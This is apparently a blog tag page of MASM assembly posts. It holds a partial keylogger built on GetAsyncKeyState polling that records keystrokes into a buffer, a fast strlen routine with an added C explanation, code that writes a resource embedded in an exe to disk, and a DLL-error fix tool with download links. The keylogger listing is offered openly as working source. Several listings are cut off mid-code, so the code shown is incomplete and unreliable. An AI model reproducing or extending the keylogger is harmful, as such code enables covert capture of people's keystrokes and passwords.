Tag: masm

Keylogger Asm

This article was written more than 24 months ago; the information may be outdated.

I rewrote the GetAsyncKeyState method in MASM; well, it is rather unpolished, but it works:
Code:


.Const

.Data?

sh DD ?
cp DD ?
Number DD ?

index DD ?
tindex DD ?
TempC DB ?

.Data

WprType DB "%lc", 0
Keys DB 512 Dup(0)

.Code
start:
Mov Keys, 0
rr:
Invoke Sleep, 60
Mov index, 0
Mov index, 8
ForLoop:
;test
Invoke GetAsyncKeyState, 14H
.If Eax
Invoke MessageBox, 0, Addr Keys, 0, 0
Invoke ExitProcess, NULL
.EndIf
;test
Invoke GetAsyncKeyState, index
.If Eax == -32767 ;
Invoke GetAsyncKeyState, 20H
.If Eax
Invoke wsprintf, Addr TempC, Addr WprType, 20H ; Space is enough ...
Invoke lstrcat, Addr Keys, Addr TempC
.ElseIf (index >= 60) && (index <= 90)
Mov sh, 0
Mov cp, 0
Invoke GetAsyncKeyState, 14H ;
Mov sh, Eax
Invoke GetAsyncKeyState, 10H ;
Mov cp, Eax
.If cp != 0 || sh != 0 ;
Xor Eax, Eax
Mov tindex, Eax
Mov Eax, index
Mov tindex, Eax
Invoke wsprintf, Addr TempC, Addr WprType, tindex

Snippet StrLen Asm

Windows has the lstrlen function, but lstrlen does not return the length in numeric format, so it has to be converted to ASCII, preferably. We can do that with the dwtoa function found in masm32.lib, but rather than using two functions to do the job of one, we can use the function below:

StrLen proc pStr:DWORD
	mov eax,[esp+1*4]                  ; get pointer to string
	mov edx,eax
	xor ecx,ecx
@@:                                    
	test al,3                        
	jz @F                            
	mov cl,[eax]                     
	inc eax                          
	test cl,cl                       
	jnz @B                           
	sub cl,1
	jmp @1
@@:                                    
	mov edx,[eax]                      ; read first 4 bytes
	add eax,4                          ; increment pointer
	lea ecx,[edx-01010101h]            ; subtract 1 from each byte
	xor edx,-1                         ; invert all bytes
	and ecx,edx                        ; and these two
	and ecx,80808080h                  ; test all sign bits
	jz @B                              ; no zero bytes, continue loop
	mov edx,[esp+1*4]                  ; get pointer to string
	add edx,3                          ; pointer+3
	test ecx,00008080h                 ; test first two bytes
	jnz @F                           
	shr ecx,16                         ; not in the first 2 bytes
	add eax,2                        
@@:
	shl cl,1                           ; use carry 
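
The listing above breaks off before its end. As an added example (C, not the author's code and not a reconstruction of the missing lines), this shows the same word-at-a-time technique the routine uses: the `lea`/`xor`/`and`/`and` zero-byte test and the byte-wise alignment prologue. The names `has_zero_byte` and `strlen_word` are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Nonzero iff some byte of w is 0x00: (w - 01010101h) & ~w & 80808080h,
   the same test as the lea/xor/and/and sequence in the listing.
   Bits above the lowest zero byte can be set spuriously by the borrow,
   so only the lowest flagged byte is trustworthy. */
static uint32_t has_zero_byte(uint32_t w)
{
    return (w - 0x01010101u) & ~w & 0x80808080u;
}

/* Length of a NUL-terminated string, scanning four bytes per step. */
size_t strlen_word(const char *s)
{
    const char *p = s;

    /* Byte-wise prologue until p is 4-byte aligned ("test al,3"). */
    while (((uintptr_t)p & 3u) != 0) {
        if (*p == '\0')
            return (size_t)(p - s);
        p++;
    }

    /* Aligned 4-byte reads. A read can take in up to 3 bytes past the
       terminator; an aligned word never straddles a page boundary, so
       it cannot fault, but it is still an over-read that memory
       checkers report when the buffer ends right after the NUL. */
    for (;;) {
        uint32_t w;
        memcpy(&w, p, sizeof w);      /* alias-safe 32-bit load */
        if (has_zero_byte(w))
            break;
        p += 4;
    }

    /* Find the first zero byte inside the flagged word, lowest address
       first, which sidesteps the spurious high bits noted above. */
    while (*p != '\0')
        p++;
    return (size_t)(p - s);
}
```

The over-read is why routines of this shape need the alignment prologue: without it, a 4-byte load starting near the end of a page could touch an unmapped page.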

Embedded File in Exe Asm

A small example of extracting a resource embedded in an exe. The example is illustrative and cannot be compiled, because it is a fragment of an executable's source code, but it may clarify which functions you could use to do this. Example below:

Invoke  FindResource, NULL, ZIPDLL, RT_FILEDATA
Mov hMIDIres, Eax ;
Invoke GetWindowItem, [hWnd], IDC_WMAIN_LSTE
Invoke SetText, Eax, Addr lste
Invoke GetWindowItem, [hWnd], IDC_WMAIN_PGB
Invoke SetValue, Eax, 70
Invoke Sleep, 2500
Invoke SizeofResource, NULL, hMIDIres ;
Mov hMIDISize, Eax ;
Invoke LoadResource, NULL, hMIDIres ;
Invoke LockResource, Eax
Mov hMIDIres, Eax
Invoke GetWindowItem, [hWnd], IDC_WMAIN_LSTF
Invoke SetText, Eax, Addr lstf
Invoke GetWindowItem, [hWnd], IDC_WMAIN_PGB
Invoke SetValue, Eax, 85
Invoke Sleep, 2500
Invoke CreateFile, Addr szdllfpath, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_ARCHIVE, 0
Mov Ebx, Eax
Invoke WriteFile, Ebx, hMIDIres, hMIDISize, Addr numchar, 0 ;
Invoke CloseHandle, Ebx
Invoke GetWindowItem, [hWnd], IDC_WMAIN_LSTG
Invoke SetText, Eax, Addr lstg
Invoke GetWindowItem, [hWnd], IDC_WMAIN_PGB
Invoke SetValue, Eax, 100

As for the functions SetValue, GetWindowItem, SetText, and Sleep …

Fix Faild to load SDCzip.dll

I wrote a fix for the "Faild to load SDCzip.dll" error that sometimes appears in Stardock IconPackager. You can download it from here: http://fix-faild-to-load-sdczip-stardock.googlecode.com/files/FixForStardock.exe . The source code is available at http://code.google.com/p/fix-faild-to-load-sdczip-stardock/downloads/list and is compatible with the EasyCoder IDE. It is not pure asm, but it can be converted relatively easily, although the code would be much longer. Below is a preview of the code, which cannot be compiled; if you want to compile it, download the source.

PS: I hope nobody feels offended by the Nazi icon …; you have to admit it is quite a successful design ….

Code:

.Const

.Data?
;dll
hMIDIres DD ?  ;
hMIDISize DD ?   ;
hMIDIdevID DD ?  ;
numchar DD ?
;dll


;path
szfolder DB ?
szstardf DB ?
szdllfpath DB ?

;path

.Data

lsta DB " Geting the path to 0X0026commun files ... " , 0
lstb DB " Creating necessary directory ... " , 0
lstc DB " Writing registry  ... "